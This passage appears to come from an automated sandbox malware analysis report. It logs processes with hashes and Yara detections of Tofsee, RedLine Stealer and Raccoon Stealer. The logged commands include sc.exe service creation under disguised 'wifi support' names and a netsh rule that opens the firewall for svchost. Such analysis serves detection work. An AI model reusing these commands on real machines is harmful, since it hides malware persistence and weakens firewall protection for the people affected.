                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Analysis Process: conhost.exe PID: 4460 Parent PID: 6020

                                                                                  General

                                                                                  Start time:09:25:16
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff724c50000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Analysis Process: cmd.exe PID: 5984 Parent PID: 5476

                                                                                  General

                                                                                  Start time:09:25:17
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\gecrjwsv.exe" C:\Windows\SysWOW64\xzxafeeu\
                                                                                  Imagebase:0x11d0000
                                                                                  File size:232960 bytes
                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Analysis Process: conhost.exe PID: 4728 Parent PID: 5984

                                                                                  General

                                                                                  Start time:09:25:17
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff724c50000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Analysis Process: sc.exe PID: 2972 Parent PID: 5476

                                                                                  General

                                                                                  Start time:09:25:17
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\SysWOW64\sc.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\System32\sc.exe" create xzxafeeu binPath= "C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe /d\"C:\Users\user\AppData\Local\Temp\E748.exe\"" type= own start= auto DisplayName= "wifi support
                                                                                  Imagebase:0xd10000
                                                                                  File size:60928 bytes
                                                                                  MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Analysis Process: conhost.exe PID: 5572 Parent PID: 2972

                                                                                  General

                                                                                  Start time:09:25:18
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff724c50000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Analysis Process: sc.exe PID: 6584 Parent PID: 5476

                                                                                  General

                                                                                  Start time:09:25:19
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\SysWOW64\sc.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\System32\sc.exe" description xzxafeeu "wifi internet conection
                                                                                  Imagebase:0xd10000
                                                                                  File size:60928 bytes
                                                                                  MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Analysis Process: conhost.exe PID: 7024 Parent PID: 6584

                                                                                  General

                                                                                  Start time:09:25:19
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff724c50000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Analysis Process: svchost.exe PID: 5016 Parent PID: 568

                                                                                  General

                                                                                  Start time:09:25:19
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                  Imagebase:0x7ff6eb840000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Analysis Process: sc.exe PID: 2848 Parent PID: 5476

                                                                                  General

                                                                                  Start time:09:25:20
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\SysWOW64\sc.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\sc.exe" start xzxafeeu
                                                                                  Imagebase:0xd10000
                                                                                  File size:60928 bytes
                                                                                  MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Analysis Process: conhost.exe PID: 1004 Parent PID: 2848

                                                                                  General

                                                                                  Start time:09:25:20
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff724c50000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Analysis Process: gecrjwsv.exe PID: 2860 Parent PID: 568

                                                                                  General

                                                                                  Start time:09:25:21
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe /d"C:\Users\user\AppData\Local\Temp\E748.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:11673600 bytes
                                                                                  MD5 hash:6DD4312F6A305B72C1A1948F27068190
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000020.00000002.803587070.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000020.00000002.803962316.00000000005A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000020.00000003.801375609.00000000005A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000020.00000002.803904384.0000000000580000.00000040.00000001.sdmp, Author: Joe Security

                                                                                  Analysis Process: netsh.exe PID: 6720 Parent PID: 5476

                                                                                  General

                                                                                  Start time:09:25:21
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                  Imagebase:0x360000
                                                                                  File size:82944 bytes
                                                                                  MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Analysis Process: svchost.exe PID: 6732 Parent PID: 2860

                                                                                  General

                                                                                  Start time:09:25:22
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:svchost.exe
                                                                                  Imagebase:0x12f0000
                                                                                  File size:44520 bytes
                                                                                  MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000022.00000002.949927934.00000000005D0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                  Analysis Process: F65C.exe PID: 5348 Parent PID: 2980

                                                                                  General

                                                                                  Start time:09:25:24
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Users\user\AppData\Local\Temp\F65C.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\F65C.exe
                                                                                  Imagebase:0x4d0000
                                                                                  File size:537088 bytes
                                                                                  MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:.Net C# or VB.NET
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000023.00000000.820336133.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000023.00000000.821341997.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000023.00000000.819697566.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000023.00000000.820836278.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                                                                                  Analysis Process: 5C89.exe PID: 5200 Parent PID: 3424

                                                                                  General

                                                                                  Start time:09:25:41
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Users\user\AppData\Local\Temp\5C89.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\5C89.exe
                                                                                  Imagebase:0x400000
                                                                                  File size:905216 bytes
                                                                                  MD5 hash:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000026.00000003.868438969.0000000004DE0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000026.00000002.1024945743.0000000004D40000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000026.00000002.953575570.0000000000400000.00000040.00020000.sdmp, Author: Joe Security

                                                                                  Disassembly

                                                                                  Code Analysis

                                                                                  Reset < >